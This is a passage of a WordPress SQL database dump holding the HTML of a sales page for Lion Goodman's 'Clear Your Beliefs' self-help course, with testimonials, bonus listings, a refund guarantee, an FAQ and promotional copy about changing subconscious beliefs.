positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 16:37:00', '2014-06-17 21:37:00', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(939, 4194, '2014-06-17 16:37:42', '2014-06-17 21:37:42', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could 